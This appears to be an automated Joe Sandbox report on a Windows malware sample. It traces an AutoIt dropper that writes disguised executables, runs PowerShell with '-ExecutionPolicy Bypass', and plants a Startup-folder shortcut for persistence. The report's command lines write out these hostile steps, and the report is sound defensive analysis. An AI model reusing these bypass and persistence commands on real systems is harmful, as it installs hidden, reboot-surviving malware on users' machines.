Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B56A0 0_2_00007FF6BB1B56A0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1595B0 0_2_00007FF6BB1595B0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB162D20 0_2_00007FF6BB162D20
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B6C34 0_2_00007FF6BB1B6C34
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB122AE0 0_2_00007FF6BB122AE0
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1C0AEC 0_2_00007FF6BB1C0AEC
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1530DC 0_2_00007FF6BB1530DC
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB130E70 0_2_00007FF6BB130E70
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB140E90 0_2_00007FF6BB140E90
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1CCE8C 0_2_00007FF6BB1CCE8C
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB166DE4 0_2_00007FF6BB166DE4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1584C0 0_2_00007FF6BB1584C0
Source: Joe Sandbox View Dropped File: C:\Users\Public\InformationCheck.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: String function: 008B1A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: String function: 008C0D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: String function: 008C8B30 appears 42 times
Source: C:\Users\Public\InformationCheck.exe Code function: String function: 00550D17 appears 70 times
Source: C:\Users\Public\InformationCheck.exe Code function: String function: 00558B30 appears 42 times
Source: C:\Users\Public\InformationCheck.exe Code function: String function: 00541A36 appears 34 times
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: String function: 00007FF6BB148D58 appears 76 times
Source: T6l6gPxwQU.exe, 00000000.00000003.1683618137.00000202FF80E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs T6l6gPxwQU.exe
Source: T6l6gPxwQU.exe, 00000000.00000003.1690464925.00000202FF734000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs T6l6gPxwQU.exe
Source: classification engine Classification label: mal100.expl.evad.winEXE@12/10@3/1
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A3778 GetLastError,FormatMessageW, 0_2_00007FF6BB1A3778
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB18D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00007FF6BB18D5CC
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB18CCE0 AdjustTokenPrivileges,CloseHandle, 0_2_00007FF6BB18CCE0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00588DE9 AdjustTokenPrivileges,CloseHandle, 3_2_00588DE9
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00589399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 3_2_00589399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008F8DE9 AdjustTokenPrivileges,CloseHandle, 10_2_008F8DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008F9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 10_2_008F9399
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1A59D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 0_2_00007FF6BB1A59D8
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB19BE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00007FF6BB19BE00
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1B7E38 CoInitializeSecurity,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket, 0_2_00007FF6BB1B7E38
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB126580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00007FF6BB126580
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe File created: C:\Users\Public\InformationCheck.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mibvk1qm.s2r.ps1 Jump to behavior
Source: T6l6gPxwQU.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: T6l6gPxwQU.exe ReversingLabs: Detection: 42%
Source: unknown Process created: C:\Users\user\Desktop\T6l6gPxwQU.exe "C:\Users\user\Desktop\T6l6gPxwQU.exe"
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: T6l6gPxwQU.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: T6l6gPxwQU.exe Static file information: File size 1974272 > 1048576
Source: T6l6gPxwQU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: T6l6gPxwQU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: T6l6gPxwQU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: T6l6gPxwQU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: T6l6gPxwQU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: T6l6gPxwQU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: T6l6gPxwQU.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: T6l6gPxwQU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: T6l6gPxwQU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: T6l6gPxwQU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: T6l6gPxwQU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: T6l6gPxwQU.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1932F4 LoadLibraryA,GetProcAddress, 0_2_00007FF6BB1932F4
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB157399 push rdi; ret 0_2_00007FF6BB1573A2
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB1578FD push rdi; ret 0_2_00007FF6BB157904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7E4300 push eax; ret 1_2_00007FFD9B7E430D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7E00AD pushad ; iretd 1_2_00007FFD9B7E00C1
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055E93F push edi; ret 3_2_0055E941
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055EA58 push esi; ret 3_2_0055EA5A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00598A4A push FFFFFF8Bh; iretd 3_2_00598A4C
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00558B75 push ecx; ret 3_2_00558B88
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0054CBF1 push eax; retf 3_2_0054CBF8
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055EC33 push esi; ret 3_2_0055EC35
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0055ED1C push edi; ret 3_2_0055ED1E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CE93F push edi; ret 10_2_008CE941
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CEA58 push esi; ret 10_2_008CEA5A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_00908A4A push FFFFFF8Bh; iretd 10_2_00908A4C
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008BCBF1 push eax; retf 10_2_008BCBF8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008C8B75 push ecx; ret 10_2_008C8B88
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CEC33 push esi; ret 10_2_008CEC35
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 10_2_008CED1C push edi; ret 10_2_008CED1E

Persistence and Installation Behavior

Source: C:\Users\Public\InformationCheck.exe File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Jump to dropped file
Source: C:\Users\user\Desktop\T6l6gPxwQU.exe File created: C:\Users\Public\InformationCheck.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\T6l6gPxwQU.exe File created: C:\Users\Public\InformationCheck.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\T6l6gPxwQU.exe Code function: 0_2_00007FF6BB144514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00007FF6BB144514
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_005B59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 3_2_005B59B3
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00545EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 3_2_00545EDA
